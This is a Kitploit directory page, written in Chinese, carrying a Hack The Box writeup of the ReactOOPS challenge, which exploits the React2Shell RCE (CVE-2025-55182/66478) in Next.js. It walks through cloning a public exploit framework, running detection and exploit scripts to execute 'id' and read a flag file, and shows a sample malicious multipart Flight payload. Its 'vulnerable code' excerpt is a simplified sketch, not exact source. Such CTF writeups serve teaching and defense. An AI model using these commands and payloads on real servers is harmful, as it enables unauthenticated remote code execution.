Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
ReactOOPS-WriteUp — Hack The Box 退役挑战 ReactOOPS 的 Writeup——CVE-2025-55182/CVE-2025-66478(React2Shell RCE)的完整解决方案与教学指南。包含详细的漏洞分析、利用技术与团队学习资料。 | Kitploit
工具/GitHubGitHub/thestingr/reactoops-writeup
静态分析漏洞分析代码分析漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育红队Payload 开发实验室与实践
6159个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
GitHub
thestingr/reactoops-writeup

ReactOOPS-WriteUp

Hack The Box 退役挑战 ReactOOPS 的 Writeup——CVE-2025-55182/CVE-2025-66478(React2Shell RCE)的完整解决方案与教学指南。包含详细的漏洞分析、利用技术与团队学习资料。

查看仓库网站
分享

ReactOOPS - HTB Web 挑战 Writeup

CVE-2025-55182 CVE-2025-66478 CVSS Score: 10.0 Critical Exploit Status: Proof of Concept Available Challenge Status: Solved Challenge Type: Web Framework: React/Next.js

作者:TheStingR - Team ISP1337Hackers
挑战:ReactOOPS(Web)
平台:Hack The Box
难度:非常简单 - 已退役
解决日期:2025年12月13日

目录

  1. 执行摘要
  2. 挑战描述
  3. 漏洞分析
  4. 侦察与枚举
  5. 利用步骤详解
  6. Flag 提取
  7. 技术深度剖析
  8. 防御与缓解措施
  9. 经验教训

执行摘要

ReactOOPS 是一个利用 CVE-2025-55182 / CVE-2025-66478 的 Web 挑战,该漏洞是 React Server Components 和 Next.js App Router 中一个严重的未认证远程代码执行漏洞。

关键发现:

  • ✅ 服务器:Next.js 16.0.6 + React 19(易受攻击)
  • ✅ 漏洞:Flight 协议反序列化中缺少 hasOwnProperty 检查
  • ✅ 影响:未经认证即可获得 root 权限的远程代码执行(RCE)
  • ✅ 利用:只需要单个 HTTP POST 请求

挑战描述

初步评估

该挑战展示了一个精致的 Next.js 应用程序,运行着 NexusAI 的助手界面。该应用似乎通过 React Server Components 处理用户输入,但响应式层中微小的故障暗示着底层存在漏洞。

技术栈

  • 框架:Next.js 16.0.6
  • React 版本:19.x
  • 部署方式:Docker 容器(Next.js standalone 构建)
  • 服务器端口:50183

为什么存在漏洞?

该应用使用:

  1. React Server Components (RSC) - 具备客户端通信的服务端渲染
  2. Flight 协议 - RSC 数据传输的序列化格式
  3. 易受攻击的依赖 - 未安装安全补丁的 react-server-dom-webpack

漏洞分析

CVE-2025-55182 / CVE-2025-66478 概览

什么是 Flight 协议?

Flight 协议是 React 专有的序列化格式,用于在 Server Component 架构中在服务端和客户端之间传输数据。它使用如下引用:

  • $1 - 指向位置 1 处对象的引用
  • $1:path:to:value - 属性路径遍历

缺失的安全检查

React 的 ReactFlightReplyServer.js 中的易受攻击代码:

// Line ~450: getOutlinedModel function
function getOutlinedModel(response, id) {
    let chunk = chunks.get(id);
    const value = chunk.value;
    
    // Process references like "$1:path:to:value"
    if (reference.startsWith('$')) {
        const refId = parseInt(reference.slice(1).split(':')[0]);
        const path = reference.slice(1).split(':').slice(1);
        
        let obj = chunks.get(refId).value;
        
        // VULNERABLE LOOP - NO hasOwnProperty CHECK!
        for (let i = 0; i < path.length; i++) {
            obj = obj[path[i]];  // ← Allows prototype chain access
        }
        return obj;
    }
}

安全版本(本应如此):

for (let i = 0; i < path.length; i++) {
    if (Object.prototype.hasOwnProperty.call(obj, path[i])) {
        obj = obj[path[i]];
    } else {
        throw new Error('Invalid property access');
    }
}

为什么这很重要

如果没有 hasOwnProperty 检查,攻击者可以遍历:

myObject[__proto__][then] → Chunk.prototype.then
myObject[__proto__][constructor] → Function
myObject[__proto__][constructor][prototype] → function.prototype

利用链

Step 1: Send reference "$1:__proto__:then"
         │
         ├─ Access myChunk[__proto__]
         └─ Then access [then] on the prototype

Step 2: Create fake Promise-like object
         │
         └─ { then: maliciousFunction }

Step 3: React calls await on this object
         │
         ├─ Invokes the .then() method
         └─ Executes attacker's function

Step 4: Arbitrary Code Execution
         │
         └─ Code runs in server context as root

为什么没有身份验证检查?

该漏洞存在于 Next-Action 验证之前:

Request Processing Flow:
├─ Parse multipart form data
├─ Deserialize Flight protocol  ← RCE HAPPENS HERE
│  └─ Process references and objects
│  └─ No hasOwnProperty check!
├─ Extract Next-Action header
├─ Validate action ID          ← This comes AFTER
└─ Execute action handler

通过在反序列化过程中触发 RCE,攻击者可以绕过所有 action 级别的安全检查。


侦察与枚举

第 1 步:初始连接测试

# Test if service is responding
curl -v http://<IP>:PORT/

预期结果:Next.js 应用返回 HTML,且启用了 RSC

第 2 步:技术识别

查找以下特征:

  • 包含 next- 前缀的响应头
  • 包含 <script type="text/x-component"> 的 HTML
  • 存在 .next 目录产物
  • 没有明显认证的 POST 端点

第 3 步:漏洞检测

最可靠的判断方法是尝试一次原型污染攻击并观察响应:

# Non-destructive detection payload
# Sends: ["$1:a:a"] referencing {}
# Vulnerable: {}.a.a throws → HTTP 500 + E{"digest"
# Patched: hasOwnProperty prevents access → no crash

利用步骤详解

环境搭建

# Navigate to challenge directory
cd /Challenges/ReactOOPS

# Clone react2shell exploit framework
git clone https://github.com/freeqaz/react2shell.git

# Verify all scripts are executable
chmod +x react2shell/*.sh

阶段 1:检测(非破坏性验证)

目标:在不造成破坏的情况下确认服务器存在漏洞

cd react2shell

# Run the detection probe
./detect.sh http://<IP>:PORT

它的作用:

  1. 创建一个带有 Next-Action: x 头的 multipart POST 请求
  2. 发送引用空对象 {} 的载荷:["$1:a:a"]
  3. 在易受攻击的服务器上:JavaScript 尝试访问 {}.a.a
  4. 缺少 hasOwnProperty 检查导致崩溃
  5. 服务器返回带有错误摘要的 HTTP 500

预期输出:

[*] React2Shell Detection Probe (CVE-2025-55182 / CVE-2025-66478)
[*] Target: http://<IP>:PORT

[*] HTTP Status: 500
[!] VULNERABLE - Server returned 500 with E{"digest" pattern

[*] Response body:
0:{\"a\":\"$@1\",\"f\":\"\",\"b\":\"s8I48LfEDhqpCdFN5-HbU\"}
1:E{\"digest\":\"346246470\"}

[!] This server is running a vulnerable version of React RSC / Next.js

结果解读:

  • HTTP 500:✅ 检测到崩溃
  • 响应中包含 E{"digest":✅ React 错误处理格式
  • 结论:服务器存在漏洞

阶段 2:远程代码执行(概念验证)

目标:验证任意命令执行

# Execute the 'id' command on the remote server
./exploit-redirect.sh -q http://<IP>:PORT "id"

它的作用:

  1. 构造包含命令载荷的 multipart payload
  2. 将命令嵌入原型污染引用中
  3. 发送带有 Next-Action: x 的 POST 请求
  4. 服务器在处理过程中反序列化并执行命令
  5. 通过 HTTP 303 重定向返回命令输出

预期输出:

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

关键洞察:输出显示 uid=0(root) - Web 服务器正以 root 身份运行!这是一个放大了影响的安全配置错误。

阶段 3:信息收集

目标:梳理文件系统并定位敏感文件

# Check current working directory
./exploit-redirect.sh -q http://<IP>:PORT "pwd"
# Output: /app/.next/standalone

# List application root directory
./exploit-redirect.sh -q http://<IP>:PORT "ls -la /app"

发现的目录结构:

/app/
├── .next/                    # Next.js build output
├── node_modules/             # Dependencies
├── app/                       # Application source code
├── public/                    # Static assets
├── flag.txt                   # ✅ TARGET FILE (mode 600)
├── package.json
└── tsconfig.json

关键发现:flag 文件位于 /app/flag.txt,权限受限(600)

阶段 4:Flag 提取

目标:读取 flag 文件

# Read the flag
./exploit-redirect.sh -q http://<IP>:PORT> "cat /app/flag.txt"

输出:

HTB{jus7_REDACTED_2025-55182}

✅ 挑战完成!


技术深度剖析

载荷结构解析

该利用构造了一个 Flight 协议载荷。命令载荷如下所示:

POST / HTTP/1.1
Host: <IP>>:PORT
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXXXX
Next-Action: x

------WebKitFormBoundaryXXXX
Content-Disposition: form-data; name="1"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "value": "{\"cmd\":\"id\"}",
  "_response": {
    "id": "1",
    "chunks": []
  }
}
------WebKitFormBoundaryXXXX
Content-Disposition: form-data; name="0"

"$@1"
------WebKitFormBoundaryXXXX--

反序列化流程

1. Parse multipart form data
   → name="1" → JSON object with "then" property
   → name="0" → String "$@1"

2. Process references
   → "$@1" means "reference to chunk 1"
   → Look up chunk[1].value
下载工具